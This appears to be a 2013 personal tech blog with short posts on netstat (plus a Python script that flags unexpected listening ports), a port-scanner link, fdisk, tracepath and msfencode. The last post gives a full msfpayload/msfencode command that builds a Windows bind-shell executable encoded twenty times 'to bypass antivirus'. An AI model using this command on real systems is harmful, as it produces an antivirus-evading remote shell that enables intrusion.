Saturday, May 11, 2013

Netstat

Netstat (network statistics) is a command-line tool that displays network connections, routing tables, and a number of network interface and network protocol statistics.
Netstat is available on Unix-like operating systems (Linux, OS X, BSD and others) and on Windows.
With the -i option we can see the interface table (eth0, wlan0, tun0 and so on): netstat -i
With -r we can see the routing table: netstat -r
With -s we can see the networking statistics: netstat -s
Example:
Ip:
278821 total packets received
6 with invalid addresses
0 forwarded
0 incoming packets discarded
278815 incoming packets delivered
260870 requests sent out
248 outgoing packets dropped
2250 dropped because of missing route
You can also see the statistics for ICMP, UDP, TCP, etc.
--numeric : don't resolve names
--numeric-hosts : don't resolve host names
--numeric-ports : don't resolve port names
--numeric-users : don't resolve user names
With -p we can display the PID/program name for sockets: netstat -p
With -l we can see listening server sockets: netstat -l
Example:
unix 2 [ ACC ] STREAM LISTENING 7053 @/tmp/dbus-xW2uFsRBZo
Use -a instead to show all sockets, both listening and non-listening.

For more information, type netstat -h
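
An added example (not part of the original post): a Python script that parses the output of netstat -l -p --numeric and reports TCP/UDP listeners that are not bound to loopback and not on an allow-list. The sample output, the allow-list and the function names are constructed for illustration.

```python
import ipaddress
from collections import namedtuple

# Constructed sample of `netstat -l -p --numeric` output (Linux net-tools layout).
SAMPLE = """\
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      812/sshd
tcp        0      0 127.0.0.1:631           0.0.0.0:*               LISTEN      640/cupsd
tcp        0      0 0.0.0.0:3333            0.0.0.0:*               LISTEN      -
tcp6       0      0 :::80                   :::*                    LISTEN      990/apache2
udp        0      0 0.0.0.0:68              0.0.0.0:*                           701/dhclient
Active UNIX domain sockets (only servers)
Proto RefCnt Flags       Type       State         I-Node   PID/Program name    Path
unix  2      [ ACC ]     STREAM     LISTENING     7053     655/dbus-daemon     @/tmp/dbus-xW2uFsRBZo
"""

Listener = namedtuple("Listener", "proto host port pid program")

def parse_listeners(text):
    """Return the TCP/UDP listening sockets found in netstat output."""
    found = []
    for line in text.splitlines():
        f = line.split()
        if len(f) < 5 or not f[0].startswith(("tcp", "udp")):
            continue  # headers and UNIX-domain sockets
        if f[0].startswith("tcp") and "LISTEN" not in f:
            continue  # with -a, established TCP connections are listed too
        host, _, port = f[3].rpartition(":")
        if not port.isdigit():
            continue  # service name instead of a number: rerun with --numeric
        # Owner column is "PID/Program", or "-" when netstat lacks the rights to see it.
        owner = next((x for x in f[5:] if x.partition("/")[0].isdigit()), "")
        pid, _, prog = owner.partition("/")
        found.append(Listener(f[0], host.split("%")[0], int(port),
                              int(pid) if pid else None, prog or None))
    return found

def unexpected(listeners, allowed):
    """Listeners not bound to loopback whose (proto, port) is not in the baseline."""
    return [l for l in listeners
            if not ipaddress.ip_address(l.host).is_loopback
            and (l.proto.rstrip("6"), l.port) not in allowed]

if __name__ == "__main__":
    baseline = {("tcp", 22), ("tcp", 80), ("udp", 68)}  # assumed allow-list
    for l in unexpected(parse_listeners(SAMPLE), baseline):
        print("unexpected listener:", l)
```

A listener whose owner shows as "-" was collected without enough privileges; run netstat as root to see the PID and program name.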

If you have any problems or need an explanation, just write under this post!

portscan-python

Python portscan lets you scan specific ports on an IP address. To run portscan.py you need Python 2.x (x>4).
Check it out from here
Source code : http://pastebin.com/2iwkxxbc

Monday, May 6, 2013

Python - Simple portscan

Check it out from here.

Fdisk

Fdisk is used to manipulate the disk partition table.
There is also a simple GUI for fdisk, cfdisk.
To run fdisk (or cfdisk) you need to be the root user.
The device is usually /dev/sda, /dev/sdb, /dev/sdc and so on for SCSI devices; for IDE devices it is usually /dev/hda, /dev/hdb and so on.
You can see your devices in /dev (ls /dev).
Type sudo fdisk /dev/sda to work on the partition table of sda.
Now if you type p you can see your partition table.
If you type v you can verify the partition table, for example:
Remaining 62 unallocated 512-byte sectors
With d you can delete a partition, and with n you can create a new partition.
When you create a new partition you can choose whether to create a primary or an extended partition (max 4 primary partitions!):
Partition type:
p primary (3 primary, 0 extended, 1 free)
e extended
For a complete list of command actions, type m.

You can specify some options when you run fdisk:
-b sectorsize: Specify the sector size of the disk. Valid values are 512, 1024, 2048 or 4096.
-c=mode: Specify the compatibility mode, 'dos' or 'nondos' (default c=nondos)
-l : List the partition tables for the specified devices and then exit.
-s partition: Print the size (in blocks) of each given partition.
Example: sudo fdisk -s /dev/sda1
9767488
sudo fdisk -s /dev/sda
156290904

If you have any problems or need an explanation, just write under this post!

Friday, May 3, 2013

Tracepath

tracepath is a tool that traces the path to a network host, discovering the MTU along this path.
The maximum transmission unit (MTU) is the size of the largest protocol data unit that the layer can pass onwards.
tracepath6 is used for IPv6; it is a replacement for traceroute6.
Example : tracepath 127.0.0.1
1: localhost.localdomain 0.528ms reached
Resume: pmtu 65535 hops 1 back 64
You can see the TTL (time to live, a mechanism that limits the lifespan or lifetime of data in a computer or network).
With tracepath you can specify some options:
-n : Print primarily IP addresses numerically.
-b : Print both of host names and IP addresses.
-l : Sets the initial packet length (instead of 65536 for tracepath and 128000 for tracepath6)

If you have any problems or need an explanation, just write under this post!

Wednesday, May 1, 2013

msfencode

msfencode is used to encode our payload to bypass antivirus.
With -e we can specify the type of encoding; to see the list of available encoders, type msfencode -l
With -l we can see the name of each encoder, its rank and its description, for example:
Name: x86/shikata_ga_nai
Rank : Excellent
Description : Polymorphic XOR Additive Feedback Encoder
With -c we can specify how many times to use the encoder.
Now we must specify the type of payload, for example pl, rb, java, c, exe and so on (for a complete list, type msfencode -h).
How can we use msfencode with msfpayload?
Example: msfpayload windows/shell/bind_tcp LPORT=3333 RHOST=ip X | msfencode -e x86/shikata_ga_nai -c 20 -t exe -o /home/HackForLulz/payload.exe
With msfpayload we create a windows/shell/bind_tcp payload and we encode it with msfencode:
Encoder : x86/shikata_ga_nai
Number of encodings : 20
Type : exe
output : /home/HackForLulz/payload.exe

If you have any problems or need an explanation, just write under this post!